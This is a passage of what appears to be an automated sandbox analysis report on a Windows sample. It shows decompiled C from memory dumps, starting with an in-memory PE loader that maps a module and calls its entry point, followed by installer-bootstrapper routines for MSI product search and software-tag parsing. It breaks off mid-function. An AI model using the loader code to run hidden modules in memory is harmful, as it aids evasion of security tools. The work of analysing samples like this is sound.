                                                                                                                                                                  															_t311 =  *((intOrPtr*)( *_v76 + 0x34)) -  *((intOrPtr*)(_v84 + 0x34));
                                                                                                                                                                  															_v80 = _t311;
                                                                                                                                                                  															if(_t311 == 0) {
                                                                                                                                                                  																 *((intOrPtr*)(_v76 + 0x18)) = 1;
                                                                                                                                                                  															} else {
                                                                                                                                                                  																_t220 = E1001B120(_v76, _v80);
                                                                                                                                                                  																_t337 = _t337 + 8;
                                                                                                                                                                  																 *((intOrPtr*)(_v76 + 0x18)) = _t220;
                                                                                                                                                                  															}
                                                                                                                                                                  															_t206 = E1001ABC0(_v76);
                                                                                                                                                                  															_t338 = _t337 + 4;
                                                                                                                                                                  															if(_t206 != 0) {
                                                                                                                                                                  																_t207 = E1001B4F0(_v76);
                                                                                                                                                                  																_t339 = _t338 + 4;
                                                                                                                                                                  																if(_t207 != 0) {
                                                                                                                                                                  																	_t209 = E1001ADE0(_v76);
                                                                                                                                                                  																	_t339 = _t339 + 4;
                                                                                                                                                                  																	if(_t209 != 0) {
                                                                                                                                                                  																		if( *((intOrPtr*)( *_v76 + 0x28)) == 0) {
                                                                                                                                                                  																			 *((intOrPtr*)(_v76 + 0x38)) = 0;
                                                                                                                                                                  																			L49:
                                                                                                                                                                  																			return _v76;
                                                                                                                                                                  																		}
                                                                                                                                                                  																		if( *(_v76 + 0x14) == 0) {
                                                                                                                                                                  																			 *((intOrPtr*)(_v76 + 0x38)) = _v24 +  *((intOrPtr*)( *_v76 + 0x28));
                                                                                                                                                                  																			L47:
                                                                                                                                                                  																			goto L49;
                                                                                                                                                                  																		}
                                                                                                                                                                  																		_v100 = _v24 +  *((intOrPtr*)( *_v76 + 0x28));
                                                                                                                                                                  																		_v96 = _v100(_v24, 1, 0);
                                                                                                                                                                  																		if(_v96 != 0) {
                                                                                                                                                                  																			 *((intOrPtr*)(_v76 + 0x10)) = 1;
                                                                                                                                                                  																			goto L47;
                                                                                                                                                                  																		}
                                                                                                                                                                  																		SetLastError(0x45a);
                                                                                                                                                                  																		L50:
                                                                                                                                                                  																		E1001A9C0(_v76);
                                                                                                                                                                  																		return 0;
                                                                                                                                                                  																	}
                                                                                                                                                                  																	goto L50;
                                                                                                                                                                  																}
                                                                                                                                                                  																goto L50;
                                                                                                                                                                  															}
                                                                                                                                                                  															goto L50;
                                                                                                                                                                  														}
                                                                                                                                                                  														goto L50;
                                                                                                                                                                  													}
                                                                                                                                                                  													goto L50;
                                                                                                                                                                  												}
                                                                                                                                                                  												_a16(_v24, 0, 0x8000, _a32);
                                                                                                                                                                  												SetLastError(0xe);
                                                                                                                                                                  												return 0;
                                                                                                                                                                  											}
                                                                                                                                                                  											_t225 = _a12(0, _v32, 0x3000, 4, _a32);
                                                                                                                                                                  											_t333 = _t333 + 0x14;
                                                                                                                                                                  											_v24 = _t225;
                                                                                                                                                                  											if(_v24 != 0) {
                                                                                                                                                                  												goto L26;
                                                                                                                                                                  											}
                                                                                                                                                                  											SetLastError(0xe);
                                                                                                                                                                  											return 0;
                                                                                                                                                                  										}
                                                                                                                                                                  										SetLastError(0xc1);
                                                                                                                                                                  										return 0;
                                                                                                                                                                  									}
                                                                                                                                                                  									SetLastError(0xc1);
                                                                                                                                                                  									return 0;
                                                                                                                                                                  								}
                                                                                                                                                                  								SetLastError(0xc1);
                                                                                                                                                                  								return 0;
                                                                                                                                                                  							}
                                                                                                                                                                  							SetLastError(0xc1);
                                                                                                                                                                  							return 0;
                                                                                                                                                                  						}
                                                                                                                                                                  						return 0;
                                                                                                                                                                  					}
                                                                                                                                                                  					SetLastError(0xc1);
                                                                                                                                                                  					return 0;
                                                                                                                                                                  				}
                                                                                                                                                                  				return 0;
                                                                                                                                                                  			}
                                                                                                                                                                  0x1001b86b
                                                                                                                                                                  0x1001b86e
                                                                                                                                                                  0x1001b875
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001b879
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001b87f
                                                                                                                                                                  0x1001b825
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001b82b
                                                                                                                                                                  0x1001b76a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001b770
                                                                                                                                                                  0x1001b74d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001b753
                                                                                                                                                                  0x1001b72c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001b732
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001b709
                                                                                                                                                                  0x1001b6df
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001b6e5
                                                                                                                                                                  0x00000000

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,GetNativeSystemInfo), ref: 1001B69E
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 1001B6A5
                                                                                                                                                                    • Part of subcall function 1001AEA0: SetLastError.KERNEL32(0000000D,?,1001B6B9,10020924,00000040), ref: 1001AEAD
                                                                                                                                                                  • SetLastError.KERNEL32(000000C1), ref: 1001B6DF
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLast$AddressHandleModuleProc
                                                                                                                                                                  • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                                                                  • API String ID: 1762409328-192647395
                                                                                                                                                                  • Opcode ID: ae3fee445ec4d19d6ee5c2b7a83ae7a0f3ff5de58bc9d8d9499198fe1faa7369
                                                                                                                                                                  • Instruction ID: 694ab680ebfe8ef0636185c130ad71dc1cebcbc5687b108a2a2fd76037c7b5c4
                                                                                                                                                                  • Opcode Fuzzy Hash: ae3fee445ec4d19d6ee5c2b7a83ae7a0f3ff5de58bc9d8d9499198fe1faa7369
                                                                                                                                                                  • Instruction Fuzzy Hash: 0AE1F874A00609DFDB04CFA4C884AAEBBB1FF88305F648558E905AF385D774E982CF91
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 71%
                                                                                                                                                                  			E004060B6(intOrPtr* _a4, intOrPtr _a8) {
                                                                                                                                                                  				char _v8;
                                                                                                                                                                  				char _v12;
                                                                                                                                                                  				char _v20;
                                                                                                                                                                  				signed int _v24;
                                                                                                                                                                  				char _v28;
                                                                                                                                                                  				void* _t36;
                                                                                                                                                                  				void* _t42;
                                                                                                                                                                  				intOrPtr _t43;
                                                                                                                                                                  				void* _t54;
                                                                                                                                                                  				void* _t55;
                                                                                                                                                                  				void* _t60;
                                                                                                                                                                  				void* _t62;
                                                                                                                                                                  				void* _t70;
                                                                                                                                                                  				void* _t71;
                                                                                                                                                                  				intOrPtr* _t74;
                                                                                                                                                                  				char* _t79;
                                                                                                                                                                  				void* _t81;
                                                                                                                                                                  				void* _t82;
                                                                                                                                                                  				void* _t83;
                                                                                                                                                                  
                                                                                                                                                                  				_t74 = _a4;
                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                  				_v12 = 0;
                                                                                                                                                                  				_t36 =  *((intOrPtr*)(_t74 + 0x10)) - 1;
                                                                                                                                                                  				if(_t36 == 0) {
                                                                                                                                                                  					_t79 = L"VersionString";
                                                                                                                                                                  					L9:
                                                                                                                                                                  					if(E00403A92(_a8,  *((intOrPtr*)(_t74 + 0x14)),  &_v8, 0) >= 0) {
                                                                                                                                                                  						_v20 = 2;
                                                                                                                                                                  						_t81 = E004352D2(0, _v8, _t79,  &_v28);
                                                                                                                                                                  						if(_t81 != 0x80070648) {
                                                                                                                                                                  							L14:
                                                                                                                                                                  							if(_t81 != 0x80070645) {
                                                                                                                                                                  								L21:
                                                                                                                                                                  								if(_t81 >= 0) {
                                                                                                                                                                  									_t42 =  *((intOrPtr*)(_t74 + 0x10)) - 1;
                                                                                                                                                                  									if(_t42 == 0) {
                                                                                                                                                                  										_push(3);
                                                                                                                                                                  										L32:
                                                                                                                                                                  										_pop(_t43);
                                                                                                                                                                  										L33:
                                                                                                                                                                  										_t82 = E00418B53( &_v28, _t43);
                                                                                                                                                                  										if(_t82 >= 0) {
                                                                                                                                                                  											_t82 = E0040465B(_a8,  *((intOrPtr*)(_t74 + 4)),  &_v28, 0);
                                                                                                                                                                  											if(_t82 >= 0) {
                                                                                                                                                                  												L39:
                                                                                                                                                                  												if(_v8 != 0) {
                                                                                                                                                                  													E004380AB(_v8);
                                                                                                                                                                  												}
                                                                                                                                                                  												E00418E52( &_v28);
                                                                                                                                                                  												return _t82;
                                                                                                                                                                  											}
                                                                                                                                                                  											_push("Failed to set variable.");
                                                                                                                                                                  											L37:
                                                                                                                                                                  											_push(_t82);
                                                                                                                                                                  											E00430A57();
                                                                                                                                                                  											L38:
                                                                                                                                                                  											_push(_t82);
                                                                                                                                                                  											E00430F28(2, "MsiProductSearch failed: ID \'%ls\', HRESULT 0x%x",  *_t74);
                                                                                                                                                                  											goto L39;
                                                                                                                                                                  										}
                                                                                                                                                                  										_push("Failed to change value type.");
                                                                                                                                                                  										goto L37;
                                                                                                                                                                  									}
                                                                                                                                                                  									_t54 = _t42 - 1;
                                                                                                                                                                  									if(_t54 == 0) {
                                                                                                                                                                  										_push(2);
                                                                                                                                                                  										goto L32;
                                                                                                                                                                  									}
                                                                                                                                                                  									_t55 = _t54 - 1;
                                                                                                                                                                  									if(_t55 == 0 || _t55 == 1) {
                                                                                                                                                                  										_t43 = 1;
                                                                                                                                                                  									} else {
                                                                                                                                                                  										_t43 = _v12;
                                                                                                                                                                  									}
                                                                                                                                                                  									goto L33;
                                                                                                                                                                  								}
                                                                                                                                                                  								_push("Failed to get product info.");
                                                                                                                                                                  								goto L37;
                                                                                                                                                                  							}
                                                                                                                                                                  							E00430F28(2, "Product not found: %ls", _v8);
                                                                                                                                                                  							_t83 = _t83 + 0xc;
                                                                                                                                                                  							_t60 =  *((intOrPtr*)(_t74 + 0x10)) - 1;
                                                                                                                                                                  							if(_t60 == 0) {
                                                                                                                                                                  								L18:
                                                                                                                                                                  								asm("xorps xmm0, xmm0");
                                                                                                                                                                  								asm("movlpd [ebp-0x18], xmm0");
                                                                                                                                                                  								L19:
                                                                                                                                                                  								_v20 = 1;
                                                                                                                                                                  								L20:
                                                                                                                                                                  								_t81 = 0;
                                                                                                                                                                  								goto L21;
                                                                                                                                                                  							}
                                                                                                                                                                  							_t62 = _t60;
                                                                                                                                                                  							if(_t62 == 0) {
                                                                                                                                                                  								_v24 = _v24 & 0x00000000;
                                                                                                                                                                  								_v28 = 2;
                                                                                                                                                                  								goto L19;
                                                                                                                                                                  							}
                                                                                                                                                                  							if(_t62 != 1) {
                                                                                                                                                                  								goto L20;
                                                                                                                                                                  							}
                                                                                                                                                                  							goto L18;
                                                                                                                                                                  						}
                                                                                                                                                                  						_push(_v8);
                                                                                                                                                                  						E00430F28(3, "Trying per-machine extended info for property \'%ls\' for product: %ls", _t79);
                                                                                                                                                                  						_t83 = _t83 + 0x10;
                                                                                                                                                                  						_t81 = E00435361(0, _v8, 0, 4, _t79,  &_v28);
                                                                                                                                                                  						if(_t81 != 0x80070645) {
                                                                                                                                                                  							goto L21;
                                                                                                                                                                  						}
                                                                                                                                                                  						_push(_v8);
                                                                                                                                                                  						E00430F28(2, "Trying per-user extended info for property \'%ls\' for product: %ls", _t79);
                                                                                                                                                                  						_t83 = _t83 + 0x10;
                                                                                                                                                                  						_t81 = E00435361(0, _v8, 0, 2, _t79,  &_v28);
                                                                                                                                                                  						goto L14;
                                                                                                                                                                  					}
                                                                                                                                                                  					_push("Failed to format product code string.");
                                                                                                                                                                  					goto L37;
                                                                                                                                                                  				}
                                                                                                                                                                  				_t70 = _t36 - 1;
                                                                                                                                                                  				if(_t70 == 0) {
                                                                                                                                                                  					_t79 = L"Language";
                                                                                                                                                                  					goto L9;
                                                                                                                                                                  				}
                                                                                                                                                                  				_t71 = _t70 - 1;
                                                                                                                                                                  				if(_t71 == 0) {
                                                                                                                                                                  					_t79 = L"State";
                                                                                                                                                                  					goto L9;
                                                                                                                                                                  				}
                                                                                                                                                                  				if(_t71 == 1) {
                                                                                                                                                                  					_t79 = L"AssignmentType";
                                                                                                                                                                  					goto L9;
                                                                                                                                                                  				}
                                                                                                                                                                  				_t82 = 0x80004001;
                                                                                                                                                                  				E00430A57(0x80004001, "Unsupported product search type: %u",  *((intOrPtr*)(_t74 + 0x10)));
                                                                                                                                                                  				_t83 = _t83 + 0xc;
                                                                                                                                                                  				goto L38;
                                                                                                                                                                  			}























                                                                                                                                                                  APIs
                                                                                                                                                                  • _MREFOpen@16.MSPDB140-MSVCRT ref: 00406122
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Open@16
                                                                                                                                                                  • String ID: AssignmentType$Failed to change value type.$Failed to format product code string.$Failed to get product info.$Failed to set variable.$Language$MsiProductSearch failed: ID '%ls', HRESULT 0x%x$Product not found: %ls$State$Trying per-machine extended info for property '%ls' for product: %ls$Trying per-user extended info for property '%ls' for product: %ls$Unsupported product search type: %u$VersionString
                                                                                                                                                                  • API String ID: 3613110473-2610262219
                                                                                                                                                                  • Opcode ID: 28ff0a39875e1cf56f6802625d888a053829eff8d0f8db6509be837485e1d935
                                                                                                                                                                  • Instruction ID: 7e1105bb82afcedc9d2fc4efbb4a08c05eac82c6eb39f8478959e40c8426e773
                                                                                                                                                                  • Opcode Fuzzy Hash: 28ff0a39875e1cf56f6802625d888a053829eff8d0f8db6509be837485e1d935
                                                                                                                                                                  • Instruction Fuzzy Hash: 1A514631941119B7DF10AA91CC43FAF7A68AB18704F12017BF902BE2C2D67C8E6196AD
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 55%
                                                                                                                                                                  			E00409CAE(signed int _a4, intOrPtr* _a8, signed int* _a12) {
                                                                                                                                                                  				signed int _v8;
                                                                                                                                                                  				signed int _v12;
                                                                                                                                                                  				signed int _v16;
                                                                                                                                                                  				void* _v20;
                                                                                                                                                                  				intOrPtr* _t42;
                                                                                                                                                                  				signed int _t46;
                                                                                                                                                                  				signed int _t64;
                                                                                                                                                                  				intOrPtr _t66;
                                                                                                                                                                  				signed int _t70;
                                                                                                                                                                  				void* _t71;
                                                                                                                                                                  				signed int _t73;
                                                                                                                                                                  				signed int _t74;
                                                                                                                                                                  				intOrPtr* _t75;
                                                                                                                                                                  				intOrPtr* _t79;
                                                                                                                                                                  				signed int _t81;
                                                                                                                                                                  				signed int _t84;
                                                                                                                                                                  
                                                                                                                                                                  				_t70 = 0;
                                                                                                                                                                  				_v20 = 0;
                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                  				_v16 = 0;
                                                                                                                                                                  				_t81 = 0;
                                                                                                                                                                  				_v12 = 0;
                                                                                                                                                                  				if(E00435FBE(_a4, L"SoftwareTag",  &_v20) >= 0) {
                                                                                                                                                                  					_t42 = _v20;
                                                                                                                                                                  					_t80 =  &_v16;
                                                                                                                                                                  					_push( &_v16);
                                                                                                                                                                  					_push(_t42);
                                                                                                                                                                  					if( *((intOrPtr*)( *_t42 + 0x20))() >= 0) {
                                                                                                                                                                  						_t73 = _v16;
                                                                                                                                                                  						if(_t73 == 0) {
                                                                                                                                                                  							L20:
                                                                                                                                                                  							_t84 = _t70;
                                                                                                                                                                  							 *_a12 = _t73;
                                                                                                                                                                  							 *_a8 = _t81;
                                                                                                                                                                  							_t81 = _t70;
                                                                                                                                                                  						} else {
                                                                                                                                                                  							_t81 = E00431078(_t73 * 0xc, 1);
                                                                                                                                                                  							if(_t81 != 0) {
                                                                                                                                                                  								_t73 = _v16;
                                                                                                                                                                  								_a4 = 0;
                                                                                                                                                                  								if(_t73 == 0) {
                                                                                                                                                                  									goto L20;
                                                                                                                                                                  								} else {
                                                                                                                                                                  									_t13 = _t81 + 8; // 0x8
                                                                                                                                                                  									_t71 = _t13;
                                                                                                                                                                  									while(1) {
                                                                                                                                                                  										_t84 = E00435F1D(_t73, _v20,  &_v8, 0);
                                                                                                                                                                  										if(_t84 < 0) {
                                                                                                                                                                  											break;
                                                                                                                                                                  										}
                                                                                                                                                                  										_t16 = _t71 - 8; // 0x0
                                                                                                                                                                  										_t84 = E00435B5E(_v8, L"Filename", _t16);
                                                                                                                                                                  										if(_t84 < 0) {
                                                                                                                                                                  											_push("Failed to get @Filename.");
                                                                                                                                                                  											goto L31;
                                                                                                                                                                  										} else {
                                                                                                                                                                  											_t18 = _t71 - 4; // 0x4
                                                                                                                                                                  											_t84 = E00435B5E(_v8, L"Regid", _t18);
                                                                                                                                                                  											if(_t84 < 0) {
                                                                                                                                                                  												_push("Failed to get @Regid.");
                                                                                                                                                                  												goto L31;
                                                                                                                                                                  											} else {
                                                                                                                                                                  												_t84 = E00435D59(_v8,  &_v12);
                                                                                                                                                                  												if(_t84 < 0) {
                                                                                                                                                                  													_push("Failed to get SoftwareTag text.");
                                                                                                                                                                  													goto L31;
                                                                                                                                                                  												} else {
                                                                                                                                                                  													_t84 = E00434262(_t80, _t71, _v12, 0, 0xfde9);
                                                                                                                                                                  													if(_t84 < 0) {
                                                                                                                                                                  														_push("Failed to convert SoftwareTag text to UTF-8");
                                                                                                                                                                  														goto L31;
                                                                                                                                                                  													} else {
                                                                                                                                                                  														_t64 = _v12;
                                                                                                                                                                  														if(_t64 != 0) {
                                                                                                                                                                  															__imp__#6(_t64);
                                                                                                                                                                  															_v12 = _v12 & 0x00000000;
                                                                                                                                                                  														}
                                                                                                                                                                  														_t79 = _v8;
                                                                                                                                                                  														if(_t79 != 0) {
                                                                                                                                                                  															 *((intOrPtr*)( *_t79 + 8))(_t79);
                                                                                                                                                                  															_v8 = _v8 & 0x00000000;
                                                                                                                                                                  														}
                                                                                                                                                                  														_t73 = _v16;
                                                                                                                                                                  														_t66 = _a4 + 1;
                                                                                                                                                                  														_t71 = _t71 + 0xc;
                                                                                                                                                                  														_a4 = _t66;
                                                                                                                                                                  														if(_t66 < _t73) {
                                                                                                                                                                  															continue;
                                                                                                                                                                  														} else {
                                                                                                                                                                  															_t70 = 0;
                                                                                                                                                                  															goto L20;
                                                                                                                                                                  														}
                                                                                                                                                                  													}
                                                                                                                                                                  												}
                                                                                                                                                                  											}
                                                                                                                                                                  										}
                                                                                                                                                                  										goto L21;
                                                                                                                                                                  									}
                                                                                                                                                                  									_push("Failed to get next node.");
                                                                                                                                                                  									goto L31;
                                                                                                                                                                  								}
                                                                                                                                                                  							} else {
                                                                                                                                                                  								_t84 = 0x8007000e;
                                                                                                                                                                  								E004300D9(_t53, "registration.cpp", 0x3ee, 0x8007000e);
                                                                                                                                                                  								_push("Failed to allocate memory for software tag structs.");
                                                                                                                                                                  								goto L31;
                                                                                                                                                                  							}
                                                                                                                                                                  						}
                                                                                                                                                                  					} else {
                                                                                                                                                                  						_push("Failed to get software tag count.");
                                                                                                                                                                  						goto L31;
                                                                                                                                                                  					}
                                                                                                                                                                  				} else {
                                                                                                                                                                  					_push("Failed to select software tag nodes.");
                                                                                                                                                                  					L31:
                                                                                                                                                                  					_push(_t84);
                                                                                                                                                                  					E00430A57();
                                                                                                                                                                  				}
                                                                                                                                                                  				L21:
                                                                                                                                                                  				_t46 = _v12;
                                                                                                                                                                  				if(_t46 != 0) {
                                                                                                                                                                  					__imp__#6(_t46);
                                                                                                                                                                  				}
                                                                                                                                                                  				_t74 = _v8;
                                                                                                                                                                  				if(_t74 != 0) {
                                                                                                                                                                  					 *((intOrPtr*)( *_t74 + 8))(_t74);
                                                                                                                                                                  				}
                                                                                                                                                                  				_t75 = _v20;
                                                                                                                                                                  				if(_t75 != 0) {
                                                                                                                                                                  					 *((intOrPtr*)( *_t75 + 8))(_t75);
                                                                                                                                                                  				}
                                                                                                                                                                  				if(_t81 != 0) {
                                                                                                                                                                  					E00431137(_t81);
                                                                                                                                                                  				}
                                                                                                                                                                  				return _t84;
                                                                                                                                                                  			}



















                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00409d9f
                                                                                                                                                                  0x00409dab
                                                                                                                                                                  0x00409daf
                                                                                                                                                                  0x00409e61
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00409db5
                                                                                                                                                                  0x00409dc5
                                                                                                                                                                  0x00409dc9
                                                                                                                                                                  0x00409e52
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00409dcf
                                                                                                                                                                  0x00409dcf
                                                                                                                                                                  0x00409dd4
                                                                                                                                                                  0x00409dd7
                                                                                                                                                                  0x00409ddd
                                                                                                                                                                  0x00409ddd
                                                                                                                                                                  0x00409de1
                                                                                                                                                                  0x00409de6
                                                                                                                                                                  0x00409deb
                                                                                                                                                                  0x00409dee
                                                                                                                                                                  0x00409dee
                                                                                                                                                                  0x00409df5
                                                                                                                                                                  0x00409df8
                                                                                                                                                                  0x00409df9
                                                                                                                                                                  0x00409dfc
                                                                                                                                                                  0x00409e01
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00409e07
                                                                                                                                                                  0x00409e07
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00409e07
                                                                                                                                                                  0x00409e01
                                                                                                                                                                  0x00409dc9
                                                                                                                                                                  0x00409daf
                                                                                                                                                                  0x00409d99
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00409d7e
                                                                                                                                                                  0x00409e76
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00409e76
                                                                                                                                                                  0x00409d21
                                                                                                                                                                  0x00409d21
                                                                                                                                                                  0x00409d31
                                                                                                                                                                  0x00409d36
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00409d36
                                                                                                                                                                  0x00409d1f
                                                                                                                                                                  0x00409cfb
                                                                                                                                                                  0x00409cfb
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00409cfb
                                                                                                                                                                  0x00409cde
                                                                                                                                                                  0x00409cde
                                                                                                                                                                  0x00409e57
                                                                                                                                                                  0x00409e57
                                                                                                                                                                  0x00409e58
                                                                                                                                                                  0x00409e5e
                                                                                                                                                                  0x00409e17
                                                                                                                                                                  0x00409e17
                                                                                                                                                                  0x00409e1c
                                                                                                                                                                  0x00409e1f
                                                                                                                                                                  0x00409e1f
                                                                                                                                                                  0x00409e25
                                                                                                                                                                  0x00409e2a
                                                                                                                                                                  0x00409e2f
                                                                                                                                                                  0x00409e2f
                                                                                                                                                                  0x00409e32
                                                                                                                                                                  0x00409e37
                                                                                                                                                                  0x00409e3c
                                                                                                                                                                  0x00409e3c
                                                                                                                                                                  0x00409e41
                                                                                                                                                                  0x00409e44
                                                                                                                                                                  0x00409e44
                                                                                                                                                                  0x00409e4f

                                                                                                                                                                  APIs
                                                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 00409E1F
                                                                                                                                                                  Strings
                                                                                                                                                                  • SoftwareTag, xrefs: 00409CBD
                                                                                                                                                                  • Regid, xrefs: 00409D88
                                                                                                                                                                  • Filename, xrefs: 00409D6D
                                                                                                                                                                  • Failed to get @Regid., xrefs: 00409E68
                                                                                                                                                                  • Failed to select software tag nodes., xrefs: 00409CDE
                                                                                                                                                                  • Failed to allocate memory for software tag structs., xrefs: 00409D36
                                                                                                                                                                  • registration.cpp, xrefs: 00409D2C
                                                                                                                                                                  • Failed to get software tag count., xrefs: 00409CFB
                                                                                                                                                                  • Failed to get next node., xrefs: 00409E76
                                                                                                                                                                  • Failed to convert SoftwareTag text to UTF-8, xrefs: 00409E52
                                                                                                                                                                  • Failed to get SoftwareTag text., xrefs: 00409E61
                                                                                                                                                                  • Failed to get @Filename., xrefs: 00409E6F
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FreeString
                                                                                                                                                                  • String ID: Failed to allocate memory for software tag structs.$Failed to convert SoftwareTag text to UTF-8$Failed to get @Filename.$Failed to get @Regid.$Failed to get SoftwareTag text.$Failed to get next node.$Failed to get software tag count.$Failed to select software tag nodes.$Filename$Regid$SoftwareTag$registration.cpp
                                                                                                                                                                  • API String ID: 3341692771-11506941
                                                                                                                                                                  • Opcode ID: 6d3b088df9f1be80e335f7dbac88f733bf2e047fe34f1e0c54c853198254b40d
                                                                                                                                                                  • Instruction ID: 9d87db156f2721f044cc9d79e436c17b50a36ec2c7ba1e493363bfb2afc7aaca
                                                                                                                                                                  • Opcode Fuzzy Hash: 6d3b088df9f1be80e335f7dbac88f733bf2e047fe34f1e0c54c853198254b40d
                                                                                                                                                                  • Instruction Fuzzy Hash: F2519E31A41315ABDB15EFA5C885FAEB7B8AF04B14F10416BF915BB2C2C739DD108B98
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 73%
                                                                                                                                                                  			E004014BB(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                  				signed int _v8;
                                                                                                                                                                  				signed int _v12;
                                                                                                                                                                  				void* __ebx;
                                                                                                                                                                  				signed short _t35;
                                                                                                                                                                  				long _t36;
                                                                                                                                                                  				signed short _t37;
                                                                                                                                                                  				signed short _t60;
                                                                                                                                                                  				signed short _t63;
                                                                                                                                                                  				intOrPtr _t75;
                                                                                                                                                                  				signed short _t79;
                                                                                                                                                                  				signed short _t83;
                                                                                                                                                                  				signed short _t86;
                                                                                                                                                                  
                                                                                                                                                                  				_t73 = __edx;
                                                                                                                                                                  				_t71 = __ecx;
                                                                                                                                                                  				_push(__ecx);
                                                                                                                                                                  				_push(__ecx);
                                                                                                                                                                  				_v8 = _v8 & 0x00000000;
                                                                                                                                                                  				_v12 = _v12 & 0x00000000;
                                                                                                                                                                  				_push(_t69);
                                                                                                                                                                  				_t75 = _a12;
                                                                                                                                                                  				if( *((intOrPtr*)(_t75 + 0x460)) != 2) {
                                                                                                                                                                  					L5:
                                                                                                                                                                  					_t35 = E0040EF74(_t69, _t71, _t75 + 0x46c, 1);
                                                                                                                                                                  					__eflags = _t35;
                                                                                                                                                                  					if(_t35 >= 0) {
                                                                                                                                                                  						_t36 = TlsAlloc();
                                                                                                                                                                  						 *(_t75 + 0x464) = _t36;
                                                                                                                                                                  						__eflags = _t36 - 0xffffffff;
                                                                                                                                                                  						if(_t36 != 0xffffffff) {
                                                                                                                                                                  							_t37 = TlsSetValue(_t36,  *(_t75 + 0x47c));
                                                                                                                                                                  							__eflags = _t37;
                                                                                                                                                                  							if(_t37 != 0) {
                                                                                                                                                                  								_t79 = E0041787A(_a4, _t75);
                                                                                                                                                                  								__eflags = _t79;
                                                                                                                                                                  								if(_t79 >= 0) {
                                                                                                                                                                  									E004331E2(_t71, _t73, 1);
                                                                                                                                                                  									E00430EA1(E00401124, _t75);
                                                                                                                                                                  									_t79 = E00416312( *(_t75 + 0x464),  *(_t75 + 0x47c),  *((intOrPtr*)(_t75 + 0x480)), _t75 + 0x290, _t75 + 0x2a8, _t75 + 0x2a0, _t75 + 0x88, _t75 + 0xf8, _t75 + 0xb8,  &_v8,  &_v12, _t75 + 0xf4, _t75 + 0x18);
                                                                                                                                                                  									E00430EA1(0, 0);
                                                                                                                                                                  									__eflags = _t79;
                                                                                                                                                                  									if(_t79 < 0) {
                                                                                                                                                                  										_push("Failed to pump messages from parent process.");
                                                                                                                                                                  										goto L15;
                                                                                                                                                                  									}
                                                                                                                                                                  								} else {
                                                                                                                                                                  									_push("Failed to create the message window.");
                                                                                                                                                                  									goto L15;
                                                                                                                                                                  								}
